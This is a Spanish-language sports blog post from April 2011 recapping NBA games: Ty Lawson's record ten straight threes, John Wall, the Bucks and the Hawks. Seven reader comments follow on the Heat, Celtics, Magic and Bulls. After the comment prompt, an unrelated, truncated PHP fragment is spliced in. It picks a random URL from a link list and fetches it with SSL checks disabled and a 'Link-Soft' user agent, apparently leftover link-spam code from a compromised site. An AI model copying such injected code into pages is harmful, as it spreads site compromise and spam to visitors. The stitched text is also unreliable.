La Crónica (09/04/2011)

10 de April de 2011 por TheDeerHunter

A 4 jornadas del final de la regular quedan pocos objetivos importantes por disputarse.

Los Spurs comenzaron a administrar descanso en hombres importantes independientemente que aún no han asegurado la ventaja campo en una hipotética final contra Bulls. Tampoco les hizo falta exprimirse más ante unos Jazz poco incisivos. Richard Jefferson, con 35, fue quien más minutos dispuso y el mejor de los suyos en la 4ª victoria consecutiva de los tejanos.

A falta de competitividad aún disfrutamos de espectáculo, el que nos brindó Denver asestándole 130 a Minnesota con Ty Lawson y Jr Smith liándola parda desde la línea de tres. El base cerró con un 10 de 11 en triples y el escolta con un 6 de 13. La mala noticia es la lesión de Danilo aunque no se espera que le afecte su participación en playoffs.

Los Hawks se están pasando en su modo “conservación” y pierden todo lo que disputan. Anoche se llevaron un palizón tremendo en la capital. 4ª derrota consecutiva. Partidazo de Wall y también, por fin, de Yi Jianlian. Impresionante también un tal Othyus Jeffers que, sinceramente, conocemos de poco.

Extraordinaria actuación también de Salmons y Gooden en la victoria de los Bucks contra Cleveland. El primero anotó 32 puntos y el segundo se marcó un triple doble jugando de center. 15 puntos, 13 rebotes y nada menos que 13 asistencias, siendo el líder del equipo en este apartado. Queda la sensación que en condiciones normales los Bucks deberían de haber disputado postemporada. Lástima.

Finalmente los Rockets no se rinden ni cuando ya no se juegan nada. Gran partido contra los Clippers amargándole la vida a Griffin. Actuación muy equilibrada de los de Adelman.

MVP: Hito histórico de Ty Lawson. El primer jugador de la historia que anota sus 10 primeros triples sin fallo. También es el 10º jugador en estos últimas 25 campañas anotando 10 triples en un partido. El último había sido precisamente JR Smith, quien también es el único en haberlo hecho en dos ocasiones. La mejor marca triplista de Lawson había sido únicamente 3 triples antes. Lawson terminó su hazaña con 37 puntos, 7 rebotes, 6 asistencias y un robo. Su equipo con un +32 con él en cancha.

El rookie: Impecable partido de John Wall en todos los aspectos. 19 puntos con buenos porcentajes de tiro, 5 rebotes, 7 asistencias y 2 robos con únicamente 2 pérdidas en su debe y un +24 de parcial. Ese es el Wall que queremos ver siempre.

La sorpresa: Muchas sorpresas. Las ya mencionadas de Ty Lawson, Yi Jianlian, Jeffers… incluso lo de Gooden. Sin embargo me quedo con un detalle. Apenas nos acordamos que Michael Red sigue en activo. Ni siquiera hemos destacado que volvió hace algunos partidos disputando algún minuto… con lo que él fue. Anoche volvió a dar pequeñas muestras de su talento en 18 minutitos, anotando 10 puntos. Le deseamos mucha suerte.

La decepción: La fuerza de los Nuggets se la llevaron algunos. Por lo visto Nené estaba demasiado deslumbrado por la actuación de sus compañeros y el tío se marcó un perfecto 0 de 8 en tiros libres. Menos mal que no necesitaron ninguno de ellos.

El mayor esfuerzo en vano: En Atlanta se están reservando las ganas para otros días más propicios. Ni siquiera la vergüenza torera les motiva. En el chaparrón, de los pocos que aguantó el tipo fue Al Horford, con 21 puntos 10 rebotes mientras sus compis sesteaban.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Pedazo de base Lawson, ametralleando el aro y haciendo historia.
    Otro que ha hecho historia ha sido Biyombo en el Hoop Summit, 12 puntos, 11 rebotes y 10 tapones en 28 minutos, convirtiendose en el primer jugador en conseguir un triple doble en este evento. Me alegro por él, y a sus jefes del Fuenlabrada, los mismos que van por ahí haciendo estúpidas declaraciones y bochornosas y descojonantes amenazas les diría lo mismo que dijo Maradona, “A mamarla. Que la sigan chupando”.

      Citar

  2. Viva_Dirk dice:
    #2

    No le salió muy bien a Maradona.

      Citar

  3. Scriers dice:
    #3

    Veo el Miami – Boston al descanso y entiendo que Miami caiga mal. Lebron tiene un parecido extraordinario con Cristiano Ronaldo. En una jugada entra en plan kamikaze y claro, si te quedas parado te megaarrolla. Pues “el otro” Oneal pone el hombro y le hace un faltón y James se enfada y le tira el balón.
    En la última jugada de la primera parte pitan salto entre dos, y Lebron no estaba de acuerdo, entonces se toma el salto a vida y muerte y luego se va corriendo a por la pelota como si le fuera la vida en ello para “dirigir” el ataque.
    Que Wade y Lebron entienden que si se la tienen que jugar la jugada consiste en irse en plan estrella hasta el aro como sea e improvisar con el talento. Y eso es de todo, menos juego en equipo.

    Solo por esos detalles, prefiero que ganen los Celtics, que no son tampoco unos santos, pero que al menos entienden el juego como una cosa de equipo. Por cierto, que otro muy criticado, Garnett ha metido un triplazo brutal.

    Aún así la diferencia en el rebote le está dando (y le dará) el partido a Miami, y ese es el principal problema de Boston para PlayOff.

      Citar

  4. Denise dice:
    #4

    Terminó el Orlando-Chicago con victoria de 3 para los Bulls. En realidad, es una buena noticia para los Magic, en esta que va a ser probablemente una de las semifinales del Este. Orlando ha aguantado hasta el ultimo segundo, teniendo posibilidades de ganar durante todo el partido, pese a no poder contar con Dwight Howard ni Redick, a pesar del horrible partido en ataque de Bass y de los ya habituales Arenas y Turkoglu, y a pesar del partidazo y el traje que nos ha hecho Derrick Rose que apenas ha fallado sus tiros, acompañado de Deng que nos ha hecho otro traje.
    Jason Richardson y Ryan Anderson han sido de lo mejorcito por parte de Orlando, candidatos a estar mañana en el “mayor esfuerzo en vano”.
    Si Arenas y Turkoglu jugasen al 50% de como lo hacían 4 años, nos zumbabamos a los Bulls seguro. Los Bulls llevan un 60-20, están haciendo un temporadón, pero luego los ves jugar, y aparte de 4 tios, no tiene mucho más, con la inspiración de Rose en modo MVP, la ayuda en ataque de Deng, Boozer y Noah, y la ayuda en defensa de los demás le está bastando para barrer a los demás.
    Valoro el balance que llevan y tienen muchas posibilidades de jugar la final, y de anillo, pero viendo la plantilla, los veo inferior a los Celtics, a los Heat y a la par que Orlando (con Turkoglu y Arenas en modo Lastre).

      Citar

  5. Denise dice:
    #5

    Vaya paliza de los Heat a los Celtics (100-77) y 16 rebotes más que han cogido ese equipo lleno de pivots espectaculares como los Heat a los Celtics (42.26). Además, los de Florida ni han necesitado la versión arrolladora del Big Three, cada uno ha aportado lo suyo de manera equilibrada (54 puntos para el Big Three y 46 para el resto).
    Los Celtics no muestran buenos sintomas desde el trade de Perkins. Posiblemente tenga el roster más amplio de la liga (en cuanto a numero de jugadores a utilizar), pero de nada le sirve porque de momento gente como Jermaine O’Neal, Delonte West, Murphy, Pavlovic o Arroyo restan más que suman, están siendo ceros a la izquierda.

      Citar

  6. Len Bias dice:
    #6

    Denise, creo que te dejas engañar por el partido de hoy. Yo creo que los Bulls son muy superiores a los Magic y que si os cruzáis en semis os ganan 4-1 o 4-2 fácil (me comeré mis palabras si no es así).
    Boozer y Noah han estado horribles, el segundo casi ni ha jugado, y el partidazo de Richardson y Anderson no les va a salir siempre. De todas formas sí es cierto que si Arenas, Turkoglu, Richardson & company juegan al 100% podéis dar guerra a cualquiera, pero se ha visto toda la temporada que esto no está siendo así.

      Citar

  7. Denise dice:
    #7

    @ Len Bias: Tampoco los Bulls van a tener la suerte de que en la pintura rival no esté Howard, como ayer.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>